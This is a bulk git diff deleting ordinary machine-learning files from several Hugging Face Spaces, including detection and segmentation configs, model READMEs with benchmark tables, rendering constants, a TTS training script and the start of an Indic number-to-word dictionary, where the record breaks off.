23d72852f22d025c9eaf2328721909f75b34e2e9..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_1x_coco-person-bicycle-car.py +++ /dev/null @@ -1,9 +0,0 @@ -_base_ = './faster_rcnn_r50_caffe_fpn_mstrain_1x_coco.py' -model = dict(roi_head=dict(bbox_head=dict(num_classes=3))) -classes = ('person', 'bicycle', 'car') -data = dict( - train=dict(classes=classes), - val=dict(classes=classes), - test=dict(classes=classes)) - -load_from = 'http://download.openmmlab.com/mmdetection/v2.0/faster_rcnn/faster_rcnn_r50_caffe_fpn_mstrain_3x_coco/faster_rcnn_r50_caffe_fpn_mstrain_3x_coco_bbox_mAP-0.398_20200504_163323-30042637.pth' # noqa diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/gn/mask_rcnn_r50_fpn_gn-all_contrib_2x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/gn/mask_rcnn_r50_fpn_gn-all_contrib_2x_coco.py deleted file mode 100644 index 89caaafbc17d871d836e810ba7c038648937254c..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/gn/mask_rcnn_r50_fpn_gn-all_contrib_2x_coco.py +++ /dev/null @@ -1,15 +0,0 @@ -_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py' -norm_cfg = dict(type='GN', num_groups=32, requires_grad=True) -model = dict( - pretrained='open-mmlab://contrib/resnet50_gn', - backbone=dict(norm_cfg=norm_cfg), - neck=dict(norm_cfg=norm_cfg), - roi_head=dict( - bbox_head=dict( - type='Shared4Conv1FCBBoxHead', - conv_out_channels=256, - norm_cfg=norm_cfg), - mask_head=dict(norm_cfg=norm_cfg))) -# learning policy -lr_config = dict(step=[16, 22]) -runner = dict(type='EpochBasedRunner', max_epochs=24) diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/vfnet/vfnet_x101_32x4d_fpn_mdconv_c3-c5_mstrain_2x_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/vfnet/vfnet_x101_32x4d_fpn_mdconv_c3-c5_mstrain_2x_coco.py deleted file mode 100644 index ebeef6ff6640e83378391d3ce7072aa296826c32..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/vfnet/vfnet_x101_32x4d_fpn_mdconv_c3-c5_mstrain_2x_coco.py +++ /dev/null @@ -1,16 +0,0 @@ -_base_ = './vfnet_r50_fpn_mdconv_c3-c5_mstrain_2x_coco.py' -model = dict( - pretrained='open-mmlab://resnext101_32x4d', - backbone=dict( - type='ResNeXt', - depth=101, - groups=32, - base_width=4, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=1, - norm_cfg=dict(type='BN', requires_grad=True), - norm_eval=True, - style='pytorch', - dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False), - stage_with_dcn=(False, True, True, True))) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r50-d8_512x512_160k_ade20k.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r50-d8_512x512_160k_ade20k.py deleted file mode 100644 index 22aaf857c3212d0b36b0b04e7990616025a3ef9b..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/danet/danet_r50-d8_512x512_160k_ade20k.py +++ /dev/null @@ -1,6 +0,0 @@ -_base_ = [ - '../_base_/models/danet_r50-d8.py', '../_base_/datasets/ade20k.py', - '../_base_/default_runtime.py', '../_base_/schedules/schedule_160k.py' -] -model = dict( - decode_head=dict(num_classes=150), auxiliary_head=dict(num_classes=150)) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/mobilenet_v2/README.md b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/mobilenet_v2/README.md deleted file mode 100644 index 7356a0ec4d7205782fe8b27e480311b58d4293ff..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/mobilenet_v2/README.md +++ /dev/null @@ -1,35 +0,0 @@ -# MobileNetV2: Inverted Residuals and Linear Bottlenecks - -## Introduction - - - -```latex -@inproceedings{sandler2018mobilenetv2, - title={Mobilenetv2: Inverted residuals and linear bottlenecks}, - author={Sandler, Mark and Howard, Andrew and Zhu, Menglong and Zhmoginov, Andrey and Chen, Liang-Chieh}, - booktitle={Proceedings of the IEEE conference on computer vision and pattern recognition}, - pages={4510--4520}, - year={2018} -} -``` - -## Results and models - -### Cityscapes - -| Method | Backbone | Crop Size | Lr schd | Mem (GB) | Inf time (fps) | mIoU | mIoU(ms+flip) | config | download | -| ---------- | -------- | --------- | ------: | -------: | -------------- | ----: | ------------- | ---------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -| FCN | M-V2-D8 | 512x1024 | 80000 | 3.4 | 14.2 | 61.54 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/fcn_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x1024_80k_cityscapes/fcn_m-v2-d8_512x1024_80k_cityscapes_20200825_124817-d24c28c1.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x1024_80k_cityscapes/fcn_m-v2-d8_512x1024_80k_cityscapes-20200825_124817.log.json) | -| PSPNet | M-V2-D8 | 512x1024 | 80000 | 3.6 | 11.2 | 70.23 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/pspnet_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x1024_80k_cityscapes/pspnet_m-v2-d8_512x1024_80k_cityscapes_20200825_124817-19e81d51.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x1024_80k_cityscapes/pspnet_m-v2-d8_512x1024_80k_cityscapes-20200825_124817.log.json) | -| DeepLabV3 | M-V2-D8 | 512x1024 | 80000 | 3.9 | 8.4 | 73.84 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x1024_80k_cityscapes/deeplabv3_m-v2-d8_512x1024_80k_cityscapes_20200825_124836-bef03590.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x1024_80k_cityscapes/deeplabv3_m-v2-d8_512x1024_80k_cityscapes-20200825_124836.log.json) | -| DeepLabV3+ | M-V2-D8 | 512x1024 | 80000 | 5.1 | 8.4 | 75.20 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes_20200825_124836-d256dd4b.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes/deeplabv3plus_m-v2-d8_512x1024_80k_cityscapes-20200825_124836.log.json) | - -### ADE20k - -| Method | Backbone | Crop Size | Lr schd | Mem (GB) | Inf time (fps) | mIoU | mIoU(ms+flip) | config | download | -| ---------- | -------- | --------- | ------: | -------: | -------------- | ----: | ------------- | ------------------------------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | -| FCN | M-V2-D8 | 512x512 | 160000 | 6.5 | 64.4 | 19.71 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/fcn_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x512_160k_ade20k/fcn_m-v2-d8_512x512_160k_ade20k_20200825_214953-c40e1095.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/fcn_m-v2-d8_512x512_160k_ade20k/fcn_m-v2-d8_512x512_160k_ade20k-20200825_214953.log.json) | -| PSPNet | M-V2-D8 | 512x512 | 160000 | 6.5 | 57.7 | 29.68 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/pspnet_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x512_160k_ade20k/pspnet_m-v2-d8_512x512_160k_ade20k_20200825_214953-f5942f7a.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/pspnet_m-v2-d8_512x512_160k_ade20k/pspnet_m-v2-d8_512x512_160k_ade20k-20200825_214953.log.json) | -| DeepLabV3 | M-V2-D8 | 512x512 | 160000 | 6.8 | 39.9 | 34.08 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x512_160k_ade20k/deeplabv3_m-v2-d8_512x512_160k_ade20k_20200825_223255-63986343.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3_m-v2-d8_512x512_160k_ade20k/deeplabv3_m-v2-d8_512x512_160k_ade20k-20200825_223255.log.json) | -| DeepLabV3+ | M-V2-D8 | 512x512 | 160000 | 8.2 | 43.1 | 34.02 | - | [config](https://github.com/open-mmlab/mmsegmentation/blob/master/configs/mobilenet_v2/deeplabv3plus_m-v2-d8_512x512_160k_ade20k.py) | [model](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x512_160k_ade20k/deeplabv3plus_m-v2-d8_512x512_160k_ade20k_20200825_223255-465a01d4.pth) | [log](https://download.openmmlab.com/mmsegmentation/v0.5/mobilenet_v2/deeplabv3plus_m-v2-d8_512x512_160k_ade20k/deeplabv3plus_m-v2-d8_512x512_160k_ade20k-20200825_223255.log.json) | diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/version.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/version.py deleted file mode 100644 index e090d9f31aae3ce0a8fd6392d519163130f437dc..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/mmseg/version.py +++ /dev/null @@ -1,18 +0,0 @@ -# Copyright (c) Open-MMLab. All rights reserved. - -__version__ = '0.13.0' - - -def parse_version_info(version_str): - version_info = [] - for x in version_str.split('.'): - if x.isdigit(): - version_info.append(int(x)) - elif x.find('rc') != -1: - patch_version = x.split('rc') - version_info.append(int(patch_version[0])) - version_info.append(f'rc{patch_version[1]}') - return tuple(version_info) - - -version_info = parse_version_info(__version__) diff --git a/spaces/Grezz/generate_human_motion/pyrender/pyrender/constants.py b/spaces/Grezz/generate_human_motion/pyrender/pyrender/constants.py deleted file mode 100644 index 8a5785b6fdb21910a174252c5af2f05b40ece4a5..0000000000000000000000000000000000000000 --- a/spaces/Grezz/generate_human_motion/pyrender/pyrender/constants.py +++ /dev/null @@ -1,149 +0,0 @@ -DEFAULT_Z_NEAR = 0.05 # Near clipping plane, in meters -DEFAULT_Z_FAR = 100.0 # Far clipping plane, in meters -DEFAULT_SCENE_SCALE = 2.0 # Default scene scale -MAX_N_LIGHTS = 4 # Maximum number of lights of each type allowed -TARGET_OPEN_GL_MAJOR = 4 # Target OpenGL Major Version -TARGET_OPEN_GL_MINOR = 1 # Target OpenGL Minor Version -MIN_OPEN_GL_MAJOR = 3 # Minimum OpenGL Major Version -MIN_OPEN_GL_MINOR = 3 # Minimum OpenGL Minor Version -FLOAT_SZ = 4 # Byte size of GL float32 -UINT_SZ = 4 # Byte size of GL uint32 -SHADOW_TEX_SZ = 2048 # Width and Height of Shadow Textures -TEXT_PADDING = 20 # Width of padding for rendering text (px) - - -# Flags for render type -class RenderFlags(object): - """Flags for rendering in the scene. - - Combine them with the bitwise or. For example, - - >>> flags = OFFSCREEN | SHADOWS_DIRECTIONAL | VERTEX_NORMALS - - would result in an offscreen render with directional shadows and - vertex normals enabled. - """ - NONE = 0 - """Normal PBR Render.""" - DEPTH_ONLY = 1 - """Only render the depth buffer.""" - OFFSCREEN = 2 - """Render offscreen and return the depth and (optionally) color buffers.""" - FLIP_WIREFRAME = 4 - """Invert the status of wireframe rendering for each mesh.""" - ALL_WIREFRAME = 8 - """Render all meshes as wireframes.""" - ALL_SOLID = 16 - """Render all meshes as solids.""" - SHADOWS_DIRECTIONAL = 32 - """Render shadows for directional lights.""" - SHADOWS_POINT = 64 - """Render shadows for point lights.""" - SHADOWS_SPOT = 128 - """Render shadows for spot lights.""" - SHADOWS_ALL = 32 | 64 | 128 - """Render shadows for all lights.""" - VERTEX_NORMALS = 256 - """Render vertex normals.""" - FACE_NORMALS = 512 - """Render face normals.""" - SKIP_CULL_FACES = 1024 - """Do not cull back faces.""" - RGBA = 2048 - """Render the color buffer with the alpha channel enabled.""" - FLAT = 4096 - """Render the color buffer flat, with no lighting computations.""" - SEG = 8192 - - -class TextAlign: - """Text alignment options for captions. - - Only use one at a time. - """ - CENTER = 0 - """Center the text by width and height.""" - CENTER_LEFT = 1 - """Center the text by height and left-align it.""" - CENTER_RIGHT = 2 - """Center the text by height and right-align it.""" - BOTTOM_LEFT = 3 - """Put the text in the bottom-left corner.""" - BOTTOM_RIGHT = 4 - """Put the text in the bottom-right corner.""" - BOTTOM_CENTER = 5 - """Center the text by width and fix it to the bottom.""" - TOP_LEFT = 6 - """Put the text in the top-left corner.""" - TOP_RIGHT = 7 - """Put the text in the top-right corner.""" - TOP_CENTER = 8 - """Center the text by width and fix it to the top.""" - - -class GLTF(object): - """Options for GL objects.""" - NEAREST = 9728 - """Nearest neighbor interpolation.""" - LINEAR = 9729 - """Linear interpolation.""" - NEAREST_MIPMAP_NEAREST = 9984 - """Nearest mipmapping.""" - LINEAR_MIPMAP_NEAREST = 9985 - """Linear mipmapping.""" - NEAREST_MIPMAP_LINEAR = 9986 - """Nearest mipmapping.""" - LINEAR_MIPMAP_LINEAR = 9987 - """Linear mipmapping.""" - CLAMP_TO_EDGE = 33071 - """Clamp to the edge of the texture.""" - MIRRORED_REPEAT = 33648 - """Mirror the texture.""" - REPEAT = 10497 - """Repeat the texture.""" - POINTS = 0 - """Render as points.""" - LINES = 1 - """Render as lines.""" - LINE_LOOP = 2 - """Render as a line loop.""" - LINE_STRIP = 3 - """Render as a line strip.""" - TRIANGLES = 4 - """Render as triangles.""" - TRIANGLE_STRIP = 5 - """Render as a triangle strip.""" - TRIANGLE_FAN = 6 - """Render as a triangle fan.""" - - -class BufFlags(object): - POSITION = 0 - NORMAL = 1 - TANGENT = 2 - TEXCOORD_0 = 4 - TEXCOORD_1 = 8 - COLOR_0 = 16 - JOINTS_0 = 32 - WEIGHTS_0 = 64 - - -class TexFlags(object): - NONE = 0 - NORMAL = 1 - OCCLUSION = 2 - EMISSIVE = 4 - BASE_COLOR = 8 - METALLIC_ROUGHNESS = 16 - DIFFUSE = 32 - SPECULAR_GLOSSINESS = 64 - - -class ProgramFlags: - NONE = 0 - USE_MATERIAL = 1 - VERTEX_NORMALS = 2 - FACE_NORMALS = 4 - - -__all__ = ['RenderFlags', 'TextAlign', 'GLTF'] diff --git a/spaces/Guldeniz/aerial-to-map/README.md b/spaces/Guldeniz/aerial-to-map/README.md deleted file mode 100644 index 43121c30c24eebb7e2848743909c3da2d8330c5b..0000000000000000000000000000000000000000 --- a/spaces/Guldeniz/aerial-to-map/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Maps To Aerial -emoji: 📈 -colorFrom: gray -colorTo: purple -sdk: gradio -sdk_version: 2.9.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces#reference diff --git a/spaces/Haitangtangtangtang/AnimeBackgroundGAN/README.md b/spaces/Haitangtangtangtang/AnimeBackgroundGAN/README.md deleted file mode 100644 index 9fde1b0be30d306bef54c19fa2057acad76d3fe8..0000000000000000000000000000000000000000 --- a/spaces/Haitangtangtangtang/AnimeBackgroundGAN/README.md +++ /dev/null @@ -1,33 +0,0 @@ ---- -title: AnimeBackgroundGAN -emoji: 🖼 -colorFrom: red -colorTo: indigo -sdk: gradio -app_file: app.py -pinned: true -duplicated_from: akiyamasho/AnimeBackgroundGAN ---- - -# Configuration - -`title`: _string_ -Anime Background GAN - -`emoji`: _string_ -🖼 - -`colorFrom`: _string_ -red - -`colorTo`: _string_ -indigo - -`sdk`: _string_ -gradio - -`app_file`: _string_ -app.py - -`pinned`: _boolean_ -true \ No newline at end of file diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/shuffled_word_order/README.finetuning.md b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/shuffled_word_order/README.finetuning.md deleted file mode 100644 index ecbcb65884640c3327a2cbaef8aad4f3cfe812f7..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/examples/shuffled_word_order/README.finetuning.md +++ /dev/null @@ -1,135 +0,0 @@ -# Fine-tuning details - -For each task (GLUE and PAWS), we perform hyperparam search for each model, and report the mean and standard deviation across 5 seeds of the best model. First, get the datasets following the instructions in [RoBERTa fine-tuning README](../roberta/README.glue.md). Alternatively, you can use [huggingface datasets](https://huggingface.co/docs/datasets/) to get the task data: - -```python -from datasets import load_dataset -import pandas as pd -from pathlib import Path - -key2file = { -"paws": { - "loc": "paws_data", - "columns": ["id", "sentence1", "sentence2", "label"], - "train": "train.tsv", - "validation": "dev.tsv", - "test": "test.tsv" - } -} - -task_data = load_dataset("paws", "labeled_final") -task_config = key2file["paws"] -save_path = Path(task_config["loc"]) -save_path.mkdir(exist_ok=True, parents=True) -for key, fl in task_config.items(): - if key in ["loc", "columns"]: - continue - print(f"Reading {key}") - columns = task_config["columns"] - df = pd.DataFrame(task_data[key]) - print(df.columns) - df = df[columns] - print(f"Got {len(df)} records") - save_loc = save_path / fl - print(f"Saving to : {save_loc}") - df.to_csv(save_loc, sep="\t", header=None, index=None) - -``` - -- Preprocess using RoBERTa GLUE preprocessing script, while keeping in mind the column numbers for `sentence1`, `sentence2` and `label` (which is 0,1,2 if you save the data according to the above example.) -- Then, fine-tuning is performed similarly to RoBERTa (for example, in case of RTE): - -```bash -TOTAL_NUM_UPDATES=30875 # 10 epochs through RTE for bsz 16 -WARMUP_UPDATES=1852 # 6 percent of the number of updates -LR=2e-05 # Peak LR for polynomial LR scheduler. -NUM_CLASSES=2 -MAX_SENTENCES=16 # Batch size. -SHUFFLED_ROBERTA_PATH=/path/to/shuffled_roberta/model.pt - -CUDA_VISIBLE_DEVICES=0 fairseq-train RTE-bin/ \ - --restore-file $SHUFFLED_ROBERTA_PATH \ - --max-positions 512 \ - --batch-size $MAX_SENTENCES \ - --max-tokens 4400 \ - --task sentence_prediction \ - --reset-optimizer --reset-dataloader --reset-meters \ - --required-batch-size-multiple 1 \ - --init-token 0 --separator-token 2 \ - --arch roberta_large \ - --criterion sentence_prediction \ - --num-classes $NUM_CLASSES \ - --dropout 0.1 --attention-dropout 0.1 \ - --weight-decay 0.1 --optimizer adam --adam-betas "(0.9, 0.98)" --adam-eps 1e-06 \ - --clip-norm 0.0 \ - --lr-scheduler polynomial_decay --lr $LR --total-num-update $TOTAL_NUM_UPDATES --warmup-updates $WARMUP_UPDATES \ - --fp16 --fp16-init-scale 4 --threshold-loss-scale 1 --fp16-scale-window 128 \ - --max-epoch 10 \ - --find-unused-parameters \ - --best-checkpoint-metric accuracy --maximize-best-checkpoint-metric; -``` - -- `TOTAL_NUM_UPDATES` is computed based on the `--batch_size` value and the dataset size. -- `WARMUP_UPDATES` is computed as 6% of `TOTAL_NUM_UPDATES` -- Best hyperparam of `--lr` and `--batch_size` is reported below: - -## `--lr` - -| | name | RTE | MRPC | SST-2 | CoLA | QQP | QNLI | MNLI | PAWS | -| --: | :----------- | ----: | ----: | ----: | ----: | ----: | ----: | ----: | ----: | -| 0 | original | 2e-05 | 2e-05 | 1e-05 | 2e-05 | 1e-05 | 1e-05 | 1e-05 | 2e-05 | -| 1 | n_1 | 2e-05 | 1e-05 | 1e-05 | 1e-05 | 3e-05 | 1e-05 | 2e-05 | 2e-05 | -| 2 | n_2 | 2e-05 | 2e-05 | 1e-05 | 1e-05 | 2e-05 | 1e-05 | 1e-05 | 3e-05 | -| 3 | n_3 | 3e-05 | 1e-05 | 2e-05 | 2e-05 | 3e-05 | 1e-05 | 1e-05 | 2e-05 | -| 4 | n_4 | 3e-05 | 1e-05 | 2e-05 | 2e-05 | 2e-05 | 1e-05 | 1e-05 | 2e-05 | -| 5 | r512 | 1e-05 | 3e-05 | 2e-05 | 2e-05 | 3e-05 | 2e-05 | 3e-05 | 2e-05 | -| 6 | rand_corpus | 2e-05 | 1e-05 | 3e-05 | 1e-05 | 3e-05 | 3e-05 | 3e-05 | 2e-05 | -| 7 | rand_uniform | 2e-05 | 1e-05 | 3e-05 | 2e-05 | 3e-05 | 3e-05 | 3e-05 | 1e-05 | -| 8 | rand_init | 1e-05 | 1e-05 | 3e-05 | 1e-05 | 1e-05 | 1e-05 | 2e-05 | 1e-05 | -| 9 | no_pos | 1e-05 | 3e-05 | 2e-05 | 1e-05 | 1e-05 | 1e-05 | 1e-05 | 1e-05 | - -## `--batch_size` - -| | name | RTE | MRPC | SST-2 | CoLA | QQP | QNLI | MNLI | PAWS | -| --: | :----------- | --: | ---: | ----: | ---: | --: | ---: | ---: | ---: | -| 0 | orig | 16 | 16 | 32 | 16 | 16 | 32 | 32 | 16 | -| 1 | n_1 | 32 | 32 | 16 | 32 | 32 | 16 | 32 | 16 | -| 2 | n_2 | 32 | 16 | 32 | 16 | 32 | 32 | 16 | 32 | -| 3 | n_3 | 32 | 32 | 16 | 32 | 32 | 16 | 32 | 32 | -| 4 | n_4 | 32 | 16 | 32 | 16 | 32 | 32 | 32 | 32 | -| 5 | r512 | 32 | 16 | 16 | 32 | 32 | 16 | 16 | 16 | -| 6 | rand_corpus | 16 | 16 | 16 | 16 | 32 | 16 | 16 | 32 | -| 7 | rand_uniform | 16 | 32 | 16 | 16 | 32 | 16 | 16 | 16 | -| 8 | rand_init | 16 | 16 | 32 | 16 | 16 | 16 | 32 | 16 | -| 9 | no_pos | 16 | 32 | 16 | 16 | 32 | 16 | 16 | 16 | - -- Perform inference similar to RoBERTa as well: - -```python -from fairseq.models.roberta import RobertaModel - -roberta = RobertaModel.from_pretrained( - 'checkpoints/', - checkpoint_file='checkpoint_best.pt', - data_name_or_path='PAWS-bin' -) - -label_fn = lambda label: roberta.task.label_dictionary.string( - [label + roberta.task.label_dictionary.nspecial] -) -ncorrect, nsamples = 0, 0 -roberta.cuda() -roberta.eval() -with open('paws_data/dev.tsv') as fin: - fin.readline() - for index, line in enumerate(fin): - tokens = line.strip().split('\t') - sent1, sent2, target = tokens[0], tokens[1], tokens[2] - tokens = roberta.encode(sent1, sent2) - prediction = roberta.predict('sentence_classification_head', tokens).argmax().item() - prediction_label = label_fn(prediction) - ncorrect += int(prediction_label == target) - nsamples += 1 -print('| Accuracy: ', float(ncorrect)/float(nsamples)) - -``` diff --git a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/scripts/glow/train_glow.sh b/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/scripts/glow/train_glow.sh deleted file mode 100644 index f12939d5d4563de555bf49408fa7a27397e0dae3..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/scripts/glow/train_glow.sh +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/bash - -gender='male' - -config='../../config/glow/'$gender'.json' -modeldir='../../checkpoints/glow/'$gender -logdir='../../logs/glow/'$gender -init=1 # 1 if start from scratch. 0 if start from last checkpoint - - -#################################################### - -if [[ $init -eq 1 ]] -then - python ../../src/glow_tts/init.py -c $config -m $modeldir -l $logdir -fi -python ../../src/glow_tts/train.py -c $config -m $modeldir -l $logdir diff --git a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/utils/inference/num_to_word_on_sent.py b/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/utils/inference/num_to_word_on_sent.py deleted file mode 100644 index ce878a8c3ee6f5ef629abeaee418d5959f7179ed..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Malayalam-TTS/ttsv/utils/inference/num_to_word_on_sent.py +++ /dev/null @@ -1,1314 +0,0 @@ -import re -import string - -# ----------------------------- indic_num.py ----------------------------- -supported_lang = {"en", "hi", "gu", "mr", "bn", "te", "ta", "kn", "or", "pa"} -# supported_lang = {'eng', 'hin', 'guj', 'mar', 'ben', 'tel', 'tam', 'kan', 'ori', 'pan'} # Three alphabet lang code - -all_num = { - "en": ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9"], - "hi": ["०", "१", "२", "३", "४", "५", "६", "७", "८", "९"], - "gu": ["૦", "૧", "૨", "૩", "૪", "૫", "૬", "૭", "૮", "૯"], - "mr": ["०", "१", "२", "३", "४", "५", "६", "७", "८", "९"], - "bn": ["০", "১", "২", "৩", "৪", "৫", "৬", "৭", "৮", "৯"], - "te": ["౦", "౧", "౨", "౩", "౪", "౫", "౬", "౭", "౮", "౯"], - "ta": ["0", "௧", "௨", "௩", "௪", "௫", "௬", "௭", "௮", "௯", "௰"], - "kn": ["೦", "೧", "೨", "೩", "೪", "೫", "೬", "೭", "೮", "೯"], - "or": ["୦", "୧", "୨", "୩", "୪", "୫", "୬", "୭", "୮", "୯"], - "pa": ["੦", "੧", "੨", "੩", "੪", "੫", "੬", "੭", "੮", "੯"], -} - -num_dict = dict() -num_dict["en"] = { - "0": "zero", - "1": "one", - "2": "two", - "3": "three", - "4": "four", - "5": "five", - "6": "six", - "7": "seven", - "8": "eight", - "9": "nine", - "10": "ten", - "11": "eleven", - "12": "twelve", - "13": "thirteen", - "14": "fourteen", - "15": "fifteen", - "16": "sixteen", - "17": "seventeen", - "18": "eighteen", - "19": "nineteen", - "20": "twenty", - "21": "twenty-one", - "22": "twenty-two", - "23": "twenty-three", - "24": "twenty-four", - "25": "twenty-five", - "26": "twenty-six", - "27": "twenty-seven", - "28": "twenty-eight", - "29": "twenty-nine", - "30": "thirty", - "31": "thirty-one", - "32": "thirty-two", - "33": "thirty-three", - "34": "thirty-four", - "35": "thirty-five", - "36": "thirty-six", - "37": "thirty-seven", - "38": "thirty-eight", - "39": "thirty-nine", - "40": "forty", - "41": "forty-one", - "42": "forty-two", - "43": "forty-three", - "44": "forty-four", - "45": "forty-five", - "46": "forty-six", - "47": "forty-seven", - "48": "forty-eight", - "49": "forty-nine", - "50": "fifty", - "51": "fifty-one", - "52": "fifty-two", - "53": "fifty-three", - "54": "fifty-four", - "55": "fifty-five", - "56": "fifty-six", - "57": "fifty-seven", - "58": "fifty-eight", - "59": "fifty-nine", - "60": "sixty", - "61": "sixty-one", - "62": "sixty-two", - "63": "sixty-three", - "64": "sixty-four", - "65": "sixty-five", - "66": "sixty-six", - "67": "sixty-seven", - "68": "sixty-eight", - "69": "sixty-nine", - "70": "seventy", - "71": "seventy-one", - "72": "seventy-two", - "73": "seventy-three", - "74": "seventy-four", - "75": "seventy-five", - "76": "seventy-six", - "77": "seventy-seven", - "78": "seventy-eight", - "79": "seventy-nine", - "80": "eighty", - "81": "eighty-one", - "82": "eighty-two", - "83": "eighty-three", - "84": "eighty-four", - "85": "eighty-five", - "86": "eighty-six", - "87": "eighty-seven", - "88": "eighty-eight", - "89": "eighty-nine", - "90": "ninety", - "91": "ninety-one", - "92": "ninety-two", - "93": "ninety-three", - "94": "ninety-four", - "95": "ninety-five", - "96": "ninety-six", - "97": "ninety-seven", - "98": "ninety-eight", - "99": "ninety-nine", - "100": "hundred", - "1000": "thousand", - "100000": "lac", - "10000000": "crore", - "1000000000": "arab", -} # English-India -num_dict["hi"] = { - "0": "शून्य", - "1": "एक", - "2": "दो", - "3": "तीन", - "4": "चार", - "5": "पाँच", - "6": "छः", - "7": "सात", - "8": "आठ", - "9": "नौ", - "10": "दस", - "11": "ग्यारह", - "12": "बारह", - "13": "तेरह", - "14": "चौदह", - "15": "पंद्रह", - "16": "सोलह", - "17": "सत्रह", - "18": "अट्ठारह", - "19": "उन्नीस", - "20": "बीस", - "21": "इक्कीस", - "22": "बाईस", - "23": "तेईस", - "24": "चौबिस", - "25": "पच्चीस", - "26": "छब्बीस", - "27": "सत्ताईस", - "28": "अट्ठाईस", - "29": "उनतीस", - "30": "तीस", - "31": "इकतीस", - "32": "बत्तीस", - "33": "तैंतीस", - "34": "चौंतीस", - "35": "पैंतीस", - "36": "छत्तीस", - "37": "सैंतीस", - "38": "अड़तीस", - "39": "उनतालीस", - "40": "चालीस", - "41": "इकतालीस", - "42": "बयालीस", - "43": "तैंतालीस", - "44": "चौंतालीस", - "45": "पैंतालीस", - "46": "छियालीस", - "47": "सैंतालीस", - "48": "अड़तालीस", - "49": "उनचास", - "50": "पचास", - "51": "इक्यावन​", - 